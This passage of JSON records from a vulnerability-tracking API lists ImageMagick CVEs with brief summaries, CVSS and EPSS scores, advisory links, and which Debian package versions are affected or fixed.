exploited for denial of service.\n\n```\nDirect leak of 13512 byte(s) in 1 object(s) allocated from:\n #0 0x7f5c11e27887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145\n #1 0x55cdc38f65c4 in AcquireMagickMemory MagickCore/memory.c:536\n #2 0x55cdc38f65eb in AcquireCriticalMemory MagickCore/memory.c:612\n #3 0x55cdc3899e91 in AcquireImage MagickCore/image.c:154\n```", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25796.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25796.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25796", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07047", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07111", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.0712", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07131", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07133", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07072", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07101", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07128", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07163", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07031", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00026", "scoring_system": "epss", "scoring_elements": "0.07048", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0006", "scoring_system": "epss", "scoring_elements": "0.18987", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25796" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25796", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25796" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/93ad259ce4f6d641eea0bee73f374af90f35efc3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/93ad259ce4f6d641eea0bee73f374af90f35efc3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-g2pr-qxjg-7r2w", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:11:19Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-g2pr-qxjg-7r2w" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25796", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25796" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442112", "reference_id": "2442112", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442112" }, { "reference_url": "https://github.com/advisories/GHSA-g2pr-qxjg-7r2w", "reference_id": "GHSA-g2pr-qxjg-7r2w", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g2pr-qxjg-7r2w" }, { "reference_url": "https://usn.ubuntu.com/8127-1/", "reference_id": "USN-8127-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/8127-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" } ], "aliases": [ "CVE-2026-25796", "GHSA-g2pr-qxjg-7r2w" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z9t9-bxf9-hkfk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/21546?format=api", "vulnerability_id": "VCID-zab9-9tqj-hbhg", "summary": "ImageMagick: Memory allocation with excessive without limits in the internal SVG decoder\nA crafted SVG file containing an malicious element causes ImageMagick to attempt to allocate ~674 GB of memory, leading to an out-of-memory abort.\n\nFound via AFL++ fuzzing with afl-clang-lto instrumentation and AddressSanitizer.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25985.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25985.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25985", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04916", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04879", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04734", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04725", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04773", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04792", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04827", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04815", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04782", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04745", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00018", "scoring_system": "epss", "scoring_elements": "0.04767", "published_at": "2026-04-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-25985" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25985", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25985" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/1a51eb9af00c36724660e294520878fd1f13e312", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick/commit/1a51eb9af00c36724660e294520878fd1f13e312" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v7g2-m8c5-mf84", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:05:38Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v7g2-m8c5-mf84" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25985", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25985" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442127", "reference_id": "2442127", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442127" }, { "reference_url": "https://github.com/advisories/GHSA-v7g2-m8c5-mf84", "reference_id": "GHSA-v7g2-m8c5-mf84", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-v7g2-m8c5-mf84" }, { "reference_url": "https://access.redhat.com/errata/RHSA-2026:5573", "reference_id": "RHSA-2026:5573", "reference_type": "", "scores": [], "url": "https://access.redhat.com/errata/RHSA-2026:5573" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" } ], "aliases": [ "CVE-2026-25985", "GHSA-v7g2-m8c5-mf84" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zab9-9tqj-hbhg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/23167?format=api", "vulnerability_id": "VCID-zvq4-ybph-buga", "summary": "ImageMagick has an Out-of-Bounds write of a zero byte in its X11 display interaction\nAn out-of-bounds write of a zero byte exists in the X11 `display` interaction path that could lead to a crash.", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33535.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-33535.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33535", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02792", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0274", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02764", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02744", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02762", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.0277", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02773", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02735", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02724", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04197", "published_at": "2026-04-02T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00252", "published_at": "2026-04-24T12:55:00Z" }, { "value": "5e-05", "scoring_system": "epss", "scoring_elements": "0.00253", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33535" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33535", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-33535" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/ImageMagick/ImageMagick" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mw3m-pqr2-qv7c", "reference_id": "", "reference_type": "", "scores": [ { "value": "4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-27T19:52:50Z/" } ], "url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-mw3m-pqr2-qv7c" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33535", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33535" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451855", "reference_id": "2451855", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451855" }, { "reference_url": "https://github.com/advisories/GHSA-mw3m-pqr2-qv7c", "reference_id": "GHSA-mw3m-pqr2-qv7c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mw3m-pqr2-qv7c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026114?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026115?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u7" }, { "url": "http://public2.vulnerablecode.io/api/packages/1068118?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1054646?format=api", "purl": "pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u7", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u7" } ], "aliases": [ "CVE-2026-33535", "GHSA-mw3m-pqr2-qv7c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zvq4-ybph-buga" } ], "fixing_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82800?format=api", "vulnerability_id": "VCID-12rd-dhh3-h3ea", "summary": "ImageMagick: denial of service in cineon parsing component", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11470.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-11470.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72893", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72901", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72922", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72897", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72935", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72948", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72973", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72955", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.7295", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72991", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.73", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.72993", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00741", "scoring_system": "epss", "scoring_elements": "0.73034", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": 